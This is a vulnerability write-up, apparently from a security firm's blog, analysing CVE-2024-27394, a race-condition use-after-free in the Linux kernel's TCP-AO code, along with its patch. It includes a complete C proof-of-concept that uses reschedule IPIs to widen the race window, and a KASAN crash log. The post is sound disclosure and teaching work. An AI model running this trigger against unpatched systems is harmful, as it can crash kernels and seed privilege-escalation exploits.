Deep Dive into RCU Race Condition: Analysis of TCP-AO UAF (CVE-2024–27394)

CVE-2024-27394 is a TCP-AO Use-After-Free vulnerability caused by improper RCU API usage. Read the in-depth analysis and reliable triggering technique.

Frontier Squad

Sep 03, 2024

Deep Dive into RCU Race Condition: Analysis of TCP-AO UAF (CVE-2024–27394)

Contents

Introduction Read-Copy-Update (RCU)ExpRace CVE-2024–27394: TCP Authentication Option Use-After-Free Conclusion Reference

Introduction

This blog post has an analysis of a Race Condition vulnerability caused by the incorrect use of an RCU API and a technique to reliably trigger it.

The vulnerability to be discussed is a TCP-AO UAF vulnerability, identified and patched by @V4bel of Theori, CVE-2024-27394. This vulnerability was patched in April and has been backported to the Stable kernel.

Read-Copy-Update (RCU)

First, I’ll briefly explain the use of Read-Copy-Update (RCU) and related APIs. RCU is a bit complicated to understand and use it correctly than other types of synchronization methods, so I'll only explain Tree RCU, which is relevant to the vulnerability and corresponds to the CONFIG_TREE_RCU setting among other RCU types. If you already know about RCU, you can skip this part.

RCU is a synchronization technique used in environments with a lot of read operations. While traditional locks (mutex, spin lock, etc.) block read operations during write operations, RCU minimizes overhead by allowing readers and writers to run concurrently.

RCU divides the Update process into three stages: Removal, Grace Period, and Reclamation. First, Removal process is executed to remove pointers so that subsequent readers cannot access the data structure, and then RCU waits for all readers to finish (Grace Period), and it will execute Reclamation process, which destroys the data structure. RCU guarantees that no UAFs exists by preventing the data structure not to be freed by kfree() while a reader is reading it. The term, Grace Period, is a period of time waiting for all readers that have accessed the data structure to complete their work. This is important because readers running concurrently on different CPUs could get confused without it.

Let’s dive deeper into the main RCU APIs and examples. First, a reader calls rcu_read_lock()/rcu_read_unlock() to specify Read-side Critical Section. And when dereferencing a pointer protected by RCU, we need to use APIs like rcu_dereference(), which acts as a memory barrier:

int example_reader(void)
{
        int val;
        rcu_read_lock();
        val = rcu_dereference(global_ptr)->a;
        rcu_read_unlock();
        return val;
}

Note that rcu_read_lock() calls preempt_disable() to prohibit preemption if CONFIG_PREEMPT_RCU is not set in the kernel. If CONFIG_PREEMPT_RCU is set, rcu_read_lock() increments current->rcu_read_lock_nesting by 1 without prohibiting preemption. The kernel used to trigger this vulnerability has CONFIG_PREEMPT_RCU enabled.

Next, updaters must not modify any data structure protected by RCU directly. Instead they must replace the data structure by using rcu_assign_pointer() after allocating a new data structure and modifying it. And when performing this replacement operation, the Update-side Critical Section must be built using a traditional lock, such as a spin lock or mutex, otherwise a Race Condition can occur between the Updaters:

void example_reclaim(struct rcu_head *head)
{
        struct example *old = container_of(head, struct example, rcu);

        kfree(old);
}

void example_updater(int a)
{
        struct example *new;
        struct example *old;

        new = kzalloc(sizeof(*new), GFP_KERNEL);

        spin_lock(&global_lock);

        old = rcu_dereference_protected(global_ptr, lockdep_is_held(&global_lock));
        new->a = a;
        rcu_assign_pointer(global_ptr, new);

        spin_unlock(&global_lock);

        call_rcu(&old->rcu, example_reclaim);
}

In the above code, call_rcu() is a function that calls the registered callback (example_reclaim) when all Read-side Critical Sections ends and the Grace Period is over. The registered reclaim callback is called in the Soft IRQ context.

Now, example_reader() and example_updater() in the example above will not cause a Race Condition when executed simultaneously. The example_reader function retrieves the original or a copy of the object from global_ptr. Even if it retrieves the original object, it is ensured that the original object will only be kfree()-d after all Read-side Critical Sections have ended.

Next, I will explain the RCU APIs related to lists. The function for adding a node to a list is list_add_rcu(), the macro for iterating over a list is list_for_each_entry_rcu, and the function for removing a node from a list is list_del_rcu(). Examples of using these APIs are as follows.

void example_add(int a)
{
        struct example *node;

        node = kzalloc(sizeof(*node), GFP_KERNEL);
        node->a = a;

        spin_lock(&global_lock);
        list_add_rcu(&node->list, &global_list);
        spin_unlock(&global_lock);
}

void exmaple_iterate(void)
{
        struct example *node;

        rcu_read_lock();
        list_for_each_entry_rcu(node, &global_list, list) {
                pr_info("Value: %d\n", node->a);
        }
        rcu_read_unlock();
}

void example_del(void)
{
        struct example *node, *tmp;
        
        spin_lock(&global_lock);

        list_for_each_entry_safe(node, tmp, &global_list, list) {
                list_del_rcu(&node->list);
                call_rcu(&node->rcu, example_reclaim);
        }
        
        spin_unlock(&global_lock);
}

The three functions in the example will not cause a Race Condition when executed simultaneously. Note that list_add_rcu() is a write operation, so you must set up an Update-side Critical Section using spin lock, etc. And list_for_each_entry_rcu must be used inside a Read-side Critical Section protected by rcu_read_lock().

Additionally, hash linked-list(hlist) has similar APIs: hlist_add_rcu(), hlist_for_each_entry_rcu, and hlist_del_rcu(). The usage and caveats are the same as the API for list.

For more information on RCU, you can refer the Kernel Doc.

ExpRace

Race condition vulnerabilities in the Linux kernel typically occur between two or more functions within the same subsystem, such as between the ioctl() and the write(), or between gc and sendmsg(). However, CVE-2024-27394 is a little different because one of the two contexts where the race occurs is the callback of call_rcu(), where the user has no direct control over their execution timing. Additionally, the race window is extremely narrow.

So I adopted a technique from the ExpRace paper accepted for USENIX Security '21 to trigger this vulnerability.

This paper describes techniques that use indirect interrupt generation mechanisms to extend the race window for increasing exploit reliability. One of the techniques introduced in the paper utilizes Reschedule Inter Processor Interrupts (Reschedule IPI), which is a soft IRQ used to move tasks to specific processors or evenly distribute tasks on a system among multiple processors. The Reschedule IPI can be generated by users to call the sched_setaffinity system call.

Now, let’s take a quick look at how to use this technique. First, here’s an example kernel module. In the example, example_open() is called when a user opens this device node via open().

static int example_open(struct inode *inode, struct file *file);

struct file_operations example_fops = {
        .open       = example_open,
};

static struct miscdevice example_driver = {
        .minor = MISC_DYNAMIC_MINOR,
        .name = "example",
        .fops = &example_fops,
};

static int example_open(struct inode *inode, struct file *file)
{
        printk(KERN_INFO "Step 1");
        printk(KERN_INFO "Step 2");
        printk(KERN_INFO "Step 3");
        printk(KERN_INFO "Step 4");

        return 0;
}

static int example_init(void)
{
        int result;

        result = misc_register(&example_driver);
        if (result) {
                printk(KERN_INFO "misc_register(): Misc device register failed");
                return result;
        }

        return 0;
}

static void example_exit(void)
{
        misc_deregister(&example_driver);
}

module_init(example_init);
module_exit(example_exit);

What if you want to extend the execution cycle between printk("Step 2") and printk("Step 3") of example_open()? It's simple: just call the sched_setaffinity syscall. (The following code was written based on the skeleton code from the ExpRace paper):

void pin_this_task_to(int cpu)
{
        cpu_set_t cset;
        CPU_ZERO(&cset);
        CPU_SET(cpu, &cset);

        // if pid is NULL then calling thread is used
        if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
                err(1, "affinity");
}

void target_thread(void *arg)
{
        int fd;

        // Suppose that a victim thread is running on core 2.
        pin_this_task_to(2);
        while (1) {
                fd = open("/dev/example", O_RDWR);
        }
}

int main()
{
        pthread_t thr;

        pthread_create(&thr, NULL, target_thread, NULL);

        // Send rescheduling IPI to core 2 to extend the race window.
        pin_this_task_to(2);
        ...

Create a thread, target_thread, which calls pin_this_task_to(2) to pin itself to CPU #2, and then repeatedly calls open() on the example module. So, example_open() function will be executed on CPU #2.
Call pin_this_task_to(2) on the parent thread. If a Reschedule IPI is received from CPU #2 just after printk("Step 2") returns in the target_thread thread, the interrupt will migrate the parent thread into CPU #2. So, the target_thread thread is going to be stall between printk("Step 2") and printk("Step 3").
After returning to the target_thread thread, the remaining printk("Step 3") and printk("Step 4" are called.

Now, if you run this code and check the kernel logs, you’ll see that the execution time between Step 1 and Step 2 is only 7 μs, but the execution time between Step 2 and Step 3 is over 200000 μs. This is because it was forcibly preempted by the Reschedule IPI sent by the user right after Step 2.

$ ./ipi_test
[    2.906480] Step 1
[    2.906487] Step 2    // 7 μs
[    3.107129] Step 3    // 200642 μs
[    3.107737] Step 4    // 608 μs

In other words, by applying this technique, we can create enough time gap longer than RCU Grace Period to preempt a task at the certain time.

Of course, since the user cannot control the preemption timing, the task must be repeated until it is preempted at the desired point.

CVE-2024–27394: TCP Authentication Option Use-After-Free

The TCP Authentication Option (TCP AO) is a network protocol option designed to enhance the security of TCP connections. This option replaces the existing TCP MD5 Signature Option, and serves to authenticate and verify data integrity over TCP connections.

CVE-2024-27394 occurs in the tcp_ao_connect_init() function within net/ipv4/tcp_ao.c. This function is invoked when a user uses the connect() function to target an IPv4-based TCP socket, and has the following call stack:

connect()
  => __sys_connect()
    => __sys_connect_file()
      => inet_stream_connect()
        => __inet_stream_connect()
          => tcp_v4_connect()
            => tcp_connect()
              => tcp_connect_init()
                => tcp_ao_connect_init()

Thus, it is called during the connection preparation process regardless of the success of the peer connection.

The tcp_ao_connect_init() function iterates over entries using hlist_for_each_entry_rcu, freeing specific keys that do not satisfy certain conditions. Although the use of call_rcu() seems to be safe, there is an issue because tcp_ao_connect_init() is not within an RCU Read-side Critical Section.

void tcp_ao_connect_init(struct sock *sk)
{
        struct tcp_sock *tp = tcp_sk(sk);
        struct tcp_ao_info *ao_info;
        union tcp_ao_addr *addr;
        struct tcp_ao_key *key;
        int family, l3index;

        ao_info = rcu_dereference_protected(tp->ao_info,
                                            lockdep_sock_is_held(sk));
        if (!ao_info)
                return;

        /* Remove all keys that don't match the peer */
        family = sk->sk_family;
        if (family == AF_INET)
                addr = (union tcp_ao_addr *)&sk->sk_daddr;
#if IS_ENABLED(CONFIG_IPV6)
        else if (family == AF_INET6)
                addr = (union tcp_ao_addr *)&sk->sk_v6_daddr;
#endif
        else
                return;
        l3index = l3mdev_master_ifindex_by_index(sock_net(sk),
                                                 sk->sk_bound_dev_if);

        hlist_for_each_entry_rcu(key, &ao_info->head, node) {    // <==[2]
                if (!tcp_ao_key_cmp(key, l3index, addr, key->prefixlen, family, -1, -1))
                        continue;

                if (key == ao_info->current_key)
                        ao_info->current_key = NULL;
                if (key == ao_info->rnext_key)
                        ao_info->rnext_key = NULL;
                hlist_del_rcu(&key->node);
                atomic_sub(tcp_ao_sizeof_key(key), &sk->sk_omem_alloc);
                call_rcu(&key->rcu, tcp_ao_key_free_rcu);
                // <==[1]
        }

If the call_rcu() completes immediately after, and the RCU Grace Period ends[1], tcp_ao_key_free_rcu() is invoked to free the key. If during iteration, the next node of the already freed key is accessed, a Use-After-Free vulnerability may occur.

This ao_info and key [2] can be allocated by calling setsockopt() with the TCP_AO_ADD_KEY command as an argument:

int tcp_parse_ao(struct sock *sk, int cmd, unsigned short int family,
                 sockptr_t optval, int optlen)
{
        if (WARN_ON_ONCE(family != AF_INET && family != AF_INET6))
                return -EAFNOSUPPORT;

        switch (cmd) {
        case TCP_AO_ADD_KEY:
                return tcp_ao_add_cmd(sk, family, optval, optlen);    // <==[3]
        case TCP_AO_DEL_KEY:
                return tcp_ao_del_cmd(sk, family, optval, optlen);
        case TCP_AO_INFO:
                return tcp_ao_info_cmd(sk, family, optval, optlen);
        default:
                WARN_ON_ONCE(1);
                return -EINVAL;
        }
}

When setsockopt() is called with TCP_AO_ADD_KEY as an argument, tcp_ao_add_cmd() is triggered[3]. If this command is used for the first time on a TCP socket, ao_info is allocated and stored in tcp_sk(sk)->ao_info [4].

static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
                          sockptr_t optval, int optlen)
{       
        ...
        ao_info = setsockopt_ao_info(sk);
        if (IS_ERR(ao_info))
                return PTR_ERR(ao_info);

        if (!ao_info) {
                ao_info = tcp_ao_alloc_info(GFP_KERNEL);
                if (!ao_info)
                        return -ENOMEM;
                first = true;
        } else {
        
        ...
        
        if (first) {
                if (!static_branch_inc(&tcp_ao_needed.key)) {
                        ret = -EUSERS;
                        goto err_free_sock;
                }
                sk_gso_disable(sk);
                rcu_assign_pointer(tcp_sk(sk)->ao_info, ao_info);    // <==[4]
        }

This means that per TCP socket, ao_info is used uniquely, and in the same flow, key is allocated and then linked with ao_info [5]:

static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
                          sockptr_t optval, int optlen)
{                
        ...
        key = tcp_ao_key_alloc(sk, &cmd);
        if (IS_ERR(key)) {
                ret = PTR_ERR(key);
                goto err_free_ao;
        }

        INIT_HLIST_NODE(&key->node);
        memcpy(&key->addr, addr, (family == AF_INET) ? sizeof(struct in_addr) :
                                                       sizeof(struct in6_addr));
        key->prefixlen  = cmd.prefix;
        key->family     = family;
        key->keyflags   = cmd.keyflags;
        key->sndid      = cmd.sndid;
        key->rcvid      = cmd.rcvid;
        key->l3index    = l3index;
        atomic64_set(&key->pkt_good, 0);
        atomic64_set(&key->pkt_bad, 0);

        ret = tcp_ao_parse_crypto(&cmd, key);
        if (ret < 0)
                goto err_free_sock;

        if (!((1 << sk->sk_state) & (TCPF_LISTEN | TCPF_CLOSE))) {
                tcp_ao_cache_traffic_keys(sk, ao_info, key);
                if (first) {
                        ao_info->current_key = key;
                        ao_info->rnext_key = key;
                }
        }

        tcp_ao_link_mkt(ao_info, key);    // <==[5]

In the tcp_ao_add_cmd() function, a new key is allocated and initialized. The key contains user-specified values such as sndid and rcvid, as well as the security key string, and is then linked to the ao_info->head.

This sets the stage for reaching the vulnerable hlist_for_each_entry_rcu in the tcp_ao_connect_init() function. To trigger the vulnerability, call_rcu() must be called immediately after. The RCU Grace Period must then end, which triggers the tcp_ao_key_free_rcu() callback and frees the key.

However, naturally occurring conditions where the RCU Grace Period ends right after call_rcu() are rare. Therefore, the Reschedule IPI technique must be used to reliably trigger this scenario. The trigger scenario would be as follows:

               cpu0                                        cpu1
     
     setsockopt(A, TCP_AO_ADD_KEY)
       key = tcp_ao_key_alloc()    // key alloc
     
     sched_setaffinity(0)
     connect(A)
       tcp_ao_connect_init(A)
         hlist_for_each_entry_rcu {
         call_rcu(key)
                                                   sched_setaffinity(0)
                                                   [ Send Reschedule IPI to cpu0 ]
     [ connect(A) is preempted ]
     connect(B)
       ...
       
     [ End of RCU Grace Period ]
     __do_softirq(A)
       rcu_core(A)
         tcp_ao_key_free_rcu(A)
           kfree(key)    // key freed
       
     [ Returning to connect(A) ]
         hlist_for_each_entry_rcu {
           key->next    // UAF

setsockopt(TCP_AO_ADD_KEY) is called to allocate ao_info and key for the TCP socket, with at least two keys allocated.
The process is then pinned to CPU #0 and connect() is called, leading to tcp_ao_connect_init() where call_rcu() is executed.
After this, another process calls sched_setaffinity(0) to send a Reschedule IPI to CPU #0, causing the process running tcp_ao_connect_init() to be preempted right after call_rcu() returns.
The RCU Grace Period ends, triggering the tcp_ao_key_free_rcu() callback registered by call_rcu(), which then kfree()s the key.
When the preempted process resumes and returns to tcp_ao_connect_init(), it accesses the already kfree()-d key via hlist_for_each_entry_rcu, leading to a Use-After-Free vulnerability.

To increase the likelihood of correctly preempting tcp_ao_connect_init() during the iteration of hlist_for_each_entry_rcu, multiple keys should be linked during the setup phase. However, there is a limitation on the number of keys that can be connected due to the unique sndid and rcvid requirements. Since these fields are of u8 type, only 256 unique keys can be linked to one ao_info.

static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
                          sockptr_t optval, int optlen)
{
        ...
        ao_info = setsockopt_ao_info(sk);
        if (IS_ERR(ao_info))
                return PTR_ERR(ao_info);

        if (!ao_info) {
                ao_info = tcp_ao_alloc_info(GFP_KERNEL);
                if (!ao_info)
                        return -ENOMEM;
                first = true;
        } else {    // <==[6]
                /* Check that neither RecvID nor SendID match any
                 * existing key for the peer, RFC5925 3.1:
                 * > The IDs of MKTs MUST NOT overlap where their
                 * > TCP connection identifiers overlap.
                 */
                if (__tcp_ao_do_lookup(sk, l3index, addr, family, cmd.prefix, -1, cmd.rcvid))
                        return -EEXIST;
                if (__tcp_ao_do_lookup(sk, l3index, addr, family,
                                       cmd.prefix, cmd.sndid, -1))
                        return -EEXIST;
        }

In the tcp_ao_add_cmd() function, if ao_info is already allocated it proceeds to check[6] the sndid and rcvid of the existing keys. Should the sndid or rcvid values provided by the user during a key allocation request overlap with any existing values, the allocation is cancelled. Therefore, the number of keys that can be linked is limited to the maximum values of the sndid and rcvid members, which are u8 types and thus can only range from 0 ~ 255. This means that only 256 keys can be linked to a single ao_info:

struct tcp_ao_key {
        ...
        u8                      sndid;
        u8                      rcvid;
        ...
};

The following is Proof-of-Concept (PoC) code that triggers the vulnerability:

#define _GNU_SOURCE

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define PORT 8080
#define TCP_AO_ADD_KEY 38
#define TCP_AO_MAXKEYLEN 80

#define DEFAULT_TEST_PASSWORD   "In this hour, I do not believe that any darkness will endure."
#define DEFAULT_TEST_ALGO       "cmac(aes128)"
#define TCP_AO_KEYF_IFINDEX     (1 << 0)

#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5

struct tcp_ao_add { /* setsockopt(TCP_AO_ADD_KEY) */
        struct __kernel_sockaddr_storage addr;  /* peer's address for the key */
        char    alg_name[64];           /* crypto hash algorithm to use */
        __s32   ifindex;                /* L3 dev index for VRF */
        __u32   set_current     :1,     /* set key as Current_key at once */
                set_rnext       :1,     /* request it from peer with RNext_key */
                reserved        :30;    /* must be 0 */
        __u16   reserved2;              /* padding, must be 0 */
        __u8    prefix;                 /* peer's address prefix */
        __u8    sndid;                  /* SendID for outgoing segments */
        __u8    rcvid;                  /* RecvID to match for incoming seg */
        __u8    maclen;                 /* length of authentication code (hash) */
        __u8    keyflags;               /* see TCP_AO_KEYF_ */
        __u8    keylen;                 /* length of ::key */
        __u8    key[TCP_AO_MAXKEYLEN];
} __attribute__((aligned(8)));

struct sockaddr_in serv_addr;

void pin_this_task_to(int cpu)
{
        cpu_set_t cset;
        CPU_ZERO(&cset);
        CPU_SET(cpu, &cset);

        if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
                perror("affinity");
}

int random_val(int a, int b)
{
        int random_value;

        srand(time(NULL));

        random_value = rand() % (b - a + 1) + a;

        return random_value;
}

void ao_add_key(int sock, __u8 prefix, __u8 sndid, __u8 rcvid, __u32 saddr)
{
        struct tcp_ao_add *ao;
        struct sockaddr_in addr = {};

        ao = (struct tcp_ao_add *)malloc(sizeof(*ao));
        memset(ao, 0, sizeof(*ao));

        ao->set_current = !!0;
        ao->set_rnext   = !!0;
        ao->prefix      = prefix;
        ao->sndid       = sndid;
        ao->rcvid       = rcvid;
        ao->maclen      = 0;
        ao->keyflags    = 0;
        ao->keylen      = 16;
        ao->ifindex     = 0;

        addr.sin_family         = AF_INET;
        addr.sin_port           = 0;
        addr.sin_addr.s_addr    = saddr;

        strncpy(ao->alg_name, DEFAULT_TEST_ALGO, 64);

        memcpy(&ao->addr, &addr, sizeof(struct sockaddr_in));

        memcpy(ao->key, "1234567890123456", 16);

        if (setsockopt(sock, IPPROTO_TCP, TCP_AO_ADD_KEY, ao, sizeof(*ao)) < 0) {
                perror("setsockopt TCP_AO_ADD_KEY failed");
                close(sock);
                exit(EXIT_FAILURE);
        }

        free(ao);
}

void add_key(int sock)
{
        ao_add_key(sock, 0, 0, 0, 0);

        for (int i = 1; i < KEY_COUNT; i++) {
                ao_add_key(sock, 31, 0 + i, 0 + i, 0x00010101);
        }
}

void ao_connect(int socks[])
{
        pid_t pid;

        for (int i = 0; i < SOCK_COUNT; i++) {
                pid = fork();
                if (pid == 0) {
                        pin_this_task_to(0);

                        if (connect(socks[i], (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
                                printf("\nConnection Failed \n");
                                exit(EXIT_FAILURE);
                        }
                } else {
                        usleep(random_val(50000, 100000));
                        kill(pid, SIGKILL);
                        wait(NULL);
                }
        }
}

int main()
{
        pid_t pid;

        serv_addr.sin_family = AF_INET;
        serv_addr.sin_port = htons(PORT);
        if (inet_pton(AF_INET, "127.0.0.1", &serv_addr.sin_addr) <= 0) {
                printf("\nInvalid address/ Address not supported \n");
                exit(EXIT_FAILURE);
        }


        while (1) {
                pid = fork();
                if (pid == 0) {
                        int socks[LOOP_COUNT][SOCK_COUNT];
                        pthread_t thr[LOOP_COUNT];

                        for (int i = 0; i < LOOP_COUNT; i++) {
                                for (int j = 0; j < SOCK_COUNT; j++) {
                                        if ((socks[i][j] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
                                                printf("\n Socket creation error \n");
                                                exit(EXIT_FAILURE);
                                        }
                                        add_key(socks[i][j]);
                                }
                        }


                        for (int i = 0; i < LOOP_COUNT; i++)
                                pthread_create(&thr[i], NULL, ao_connect, socks[i]);

                        sleep(15);
                        exit(0);
                } else {
                        int status;

                        waitpid(pid, &status, 0);
                        sleep(0.1);
                }
        }

        return 0;
}

Here is a step-by-step explanation of the PoC code. First, 1000 TCP sockets are created and then add_key() is called to allocate ao_info to each socket and link 256 keys. This avoids unnecessary allocation tasks during later preemption.

#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5

void add_key(int sock)
{
        ao_add_key(sock, 0, 0, 0, 0);

        for (int i = 1; i < KEY_COUNT; i++) {
                ao_add_key(sock, 31, 0 + i, 0 + i, 0x00010101);
        }
}

int main()
{
        ...
        while (1) {
                pid = fork();
                if (pid == 0) {
                        int socks[LOOP_COUNT][SOCK_COUNT];
                        pthread_t thr[LOOP_COUNT];

                        for (int i = 0; i < LOOP_COUNT; i++) {
                                for (int j = 0; j < SOCK_COUNT; j++) {
                                        if ((socks[i][j] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
                                                printf("\n Socket creation error \n");
                                                exit(EXIT_FAILURE);
                                        }
                                        add_key(socks[i][j]);
                                }
                        }

Next, five ao_connect threads are created and executed. Each ao_connect thread first calls pin_this_task_to(0) to pin subsequent operations to CPU #0. Then, it calls connect() on a TCP socket that had keys linked during the previous preparation phase to trigger tcp_ao_connect_init(). The reason for dividing the 1000 sockets among five threads is to enable the five ao_connect threads to continuously send Reschedule IPIs and preempt each other within the traversal of hlist_for_each_entry_rcu when they call pin_this_task_to(0).

#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5

void pin_this_task_to(int cpu)
{
        cpu_set_t cset;
        CPU_ZERO(&cset);
        CPU_SET(cpu, &cset);

        if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
                perror("affinity");
}

void ao_connect(int socks[])
{
        pid_t pid;

        for (int i = 0; i < SOCK_COUNT; i++) {
                pid = fork();
                if (pid == 0) {
                        pin_this_task_to(0);

                        if (connect(socks[i], (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
                                printf("\nConnection Failed \n");
                                exit(EXIT_FAILURE);
                        }
                } else {
                        usleep(random_val(50000, 100000));
                        kill(pid, SIGKILL);
                        wait(NULL);
                }
        }
}

int main()
{
        ...
        for (int i = 0; i < LOOP_COUNT; i++)
                pthread_create(&thr[i], NULL, ao_connect, socks[i]);

Now, by running the PoC code on a kernel with KASAN and CONFIG_PREEMPT=y enabled, you can obtain the following KASAN log.

[  355.599161] ==================================================================
[  355.599841] BUG: KASAN: slab-use-after-free in tcp_ao_connect_init+0x66d/0x7e0
[  355.600479] Read of size 8 at addr ffff88810a3d0400 by task poc/17851
[  355.601113]
[  355.601257] CPU: 0 PID: 17851 Comm: poc Not tainted 6.8.4 #17
[  355.601829] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[  355.602557] Call Trace:
[  355.602778]  
[  355.602972]  dump_stack_lvl+0x44/0x60
[  355.603300]  print_report+0xc2/0x610
[  355.604404]  kasan_report+0xac/0xe0
[  355.605029]  tcp_ao_connect_init+0x66d/0x7e0
[  355.605827]  tcp_connect+0x2df/0x5230
[  355.607237]  tcp_v4_connect+0x10d5/0x1860
[  355.607744]  __inet_stream_connect+0x389/0xe80
[  355.609741]  inet_stream_connect+0x53/0xa0
[  355.609989]  __sys_connect+0x101/0x130
[  355.611054]  __x64_sys_connect+0x6e/0xb0
[  355.611533]  do_syscall_64+0x7e/0x120
[  355.613167]  entry_SYSCALL_64_after_hwframe+0x73/0x7b
[  355.613474] RIP: 0033:0x4557cb
[  355.613664] Code: 83 ec 18 89 54 24 0c 48 89 34 24 89 7c 24 08 e8 ab 8c 02 00 8b 54 24 0c 48 8b 34 24 41 89 c0 8b 7c 24 08 b8 2a 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 35 44 89 c7 89 44 24 08 e8 f1 8c 02 00 8b 44
[  355.614784] RSP: 002b:00007d73c9e001a0 EFLAGS: 00000293 ORIG_RAX: 000000000000002a
[  355.615237] RAX: ffffffffffffffda RBX: 00007d73c9e00640 RCX: 00000000004557cb
[  355.615673] RDX: 0000000000000010 RSI: 00000000004e6380 RDI: 0000000000000096
[  355.616106] RBP: 00007d73c9e001d0 R08: 0000000000000000 R09: 00007d73c9e00640
[  355.616539] R10: 00007d73c9e00910 R11: 0000000000000293 R12: 00007d73c9e00640
[  355.616970] R13: 0000000000000000 R14: 0000000000416320 R15: 00007d73c9600000
[  355.617409]  
[  355.617547]
[  355.617644] Allocated by task 17110:
[  355.617865]  kasan_save_stack+0x20/0x40
[  355.618104]  kasan_save_track+0x10/0x30
[  355.618340]  __kasan_kmalloc+0x7b/0x90
[  355.618574]  __kmalloc+0x207/0x4e0
[  355.618787]  sock_kmalloc+0xdf/0x130
[  355.619008]  tcp_ao_add_cmd+0xa59/0x1d60
[  355.619250]  do_tcp_setsockopt+0xb19/0x2f60
[  355.619509]  do_sock_setsockopt+0x1e5/0x3f0
[  355.619766]  __sys_setsockopt+0x101/0x1a0
[  355.620011]  __x64_sys_setsockopt+0xb9/0x150
[  355.620274]  do_syscall_64+0x7e/0x120
[  355.620503]  entry_SYSCALL_64_after_hwframe+0x73/0x7b
[  355.620812]
[  355.620909] Freed by task 17853:
[  355.621109]  kasan_save_stack+0x20/0x40
[  355.621349]  kasan_save_track+0x10/0x30
[  355.621586]  kasan_save_free_info+0x37/0x60
[  355.621842]  __kasan_slab_free+0x102/0x190
[  355.622093]  kfree+0xd8/0x2c0
[  355.622282]  rcu_core+0xb2c/0x15b0
[  355.622491]  __do_softirq+0x1c7/0x612
[  355.622717]
[  355.622814] Last potentially related work creation:
[  355.623116]  kasan_save_stack+0x20/0x40
[  355.623351]  __kasan_record_aux_stack+0x8e/0xa0
[  355.623633]  __call_rcu_common.constprop.0+0x6f/0x730
[  355.623946]  tcp_ao_connect_init+0x325/0x7e0
[  355.624194]  tcp_connect+0x2df/0x5230
[  355.624415]  tcp_v4_connect+0x10d5/0x1860
[  355.624659]  __inet_stream_connect+0x389/0xe80
[  355.624934]  inet_stream_connect+0x53/0xa0
[  355.625192]  __sys_connect+0x101/0x130
[  355.625429]  __x64_sys_connect+0x6e/0xb0
[  355.625669]  do_syscall_64+0x7e/0x120
[  355.625894]  entry_SYSCALL_64_after_hwframe+0x73/0x7b
[  355.626209]
[  355.626309] The buggy address belongs to the object at ffff88810a3d0400
[  355.626309]  which belongs to the cache kmalloc-256 of size 256
[  355.627059] The buggy address is located 0 bytes inside of
[  355.627059]  freed 256-byte region [ffff88810a3d0400, ffff88810a3d0500)
[  355.627788]
[  355.627889] The buggy address belongs to the physical page:
[  355.628229] page:00000000cc00e344 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10a3d0
[  355.628797] head:00000000cc00e344 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0
[  355.629285] anon flags: 0x200000000000840(slab|head|node=0|zone=2)
[  355.629663] page_type: 0xffffffff()
[  355.629880] raw: 0200000000000840 ffff888100042b40 0000000000000000 dead000000000001
[  355.630348] raw: 0000000000000000 0000000000100010 00000001ffffffff 0000000000000000
[  355.630812] page dumped because: kasan: bad access detected
[  355.631151]
[  355.631251] Memory state around the buggy address:
[  355.631545]  ffff88810a3d0300: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  355.631984]  ffff88810a3d0380: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  355.632420] >ffff88810a3d0400: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  355.632854]                    ^
[  355.633056]  ffff88810a3d0480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  355.633491]  ffff88810a3d0500: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  355.633931] ==================================================================
[  355.634447] Disabling lock debugging due to kernel taint

Since this vulnerability occurs in TCP, it can be triggered without the need to create a separate Network Namespace.

In the end, I patched this CVE-2024-27394 by replacing hlist_for_each_entry_rcu with hlist_for_each_entry_safe to prevent UAF regardless of the RCU Read-side Critical Section.

diff --git a/net/ipv4/tcp_ao.c b/net/ipv4/tcp_ao.c
index 3afeeb68e8a7..781b67a52571 100644
--- a/net/ipv4/tcp_ao.c
+++ b/net/ipv4/tcp_ao.c
@@ -1068,6 +1068,7 @@ void tcp_ao_connect_init(struct sock *sk)
 {
  struct tcp_sock *tp = tcp_sk(sk);
  struct tcp_ao_info *ao_info;
+ struct hlist_node *next;
  union tcp_ao_addr *addr;
  struct tcp_ao_key *key;
  int family, l3index;
@@ -1090,7 +1091,7 @@ void tcp_ao_connect_init(struct sock *sk)
  l3index = l3mdev_master_ifindex_by_index(sock_net(sk),
        sk->sk_bound_dev_if);
 
- hlist_for_each_entry_rcu(key, &ao_info->head, node) {
+ hlist_for_each_entry_safe(key, next, &ao_info->head, node) {
   if (!tcp_ao_key_cmp(key, l3index, addr, key->prefixlen, family, -1, -1))
    continue;

Conclusion

This post analyzed the vulnerability CVE-2024-27394, which arose from the incorrect use of RCU, and introduced a method to reliably trigger it using the ExpRace technique.

In the case of Race Conditions caused by the incorrect use of RCU, it can be challenging to identify vulnerabilities because there are various types of RCU APIs, and Read-side Critical Sections can be nested. Therefore, more focused analysis is required to find such RCU Race Condition vulnerabilities.